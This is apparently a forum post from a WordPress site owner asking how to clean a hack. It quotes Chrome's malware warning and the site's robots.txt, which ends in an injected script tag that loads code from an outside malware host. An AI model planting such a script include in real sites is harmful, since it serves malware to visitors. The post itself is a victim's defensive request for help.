Hacked robots.txt

My WordPress site cateavery.com has been hacked. Google Chrome is giving an error message:

Warning: Something’s Not Right Here!
cateavery.com contains content from cessio33noutst.rr.nu, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified cessio33noutst.rr.nu that we found malware on the site. For more about the problems found on cessio33noutst.rr.nu, visit the Google Safe Browsing diagnostic page.

I’ve done some digging and, if I go to cateavery.com/robots.txt, I get the following:

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/

Sitemap: https://cateavery.com/sitemap.xml.gz
<script src=”https://hadowp04ercept.rr.nu/pmg.php?d=x”></script&gt;

So there’s a script to the suspect site there. I looked for robots.txt in my FTP client, but it wasn’t there. From what I’ve read, it appears that WordPress writes a virtual robots.txt file and I can override it with a manually created one at the site root. Will doing that fix the problem? Or is the script somewhere else and needs to be removed?

I’ve updated everything and changed my passwords. I just want to be clear how to get rid of this.

In Google’s Webmaster Tools, validating my sitemap gives error codes. I don’t know if that’s relevant.

Sitemap contains urls which are blocked by robots.txt.

I have visibility set to allow search engines in the WordPress UI, but when I logged in after getting hacked, it was set to private. I’m pretty sure I didn’t set it that way.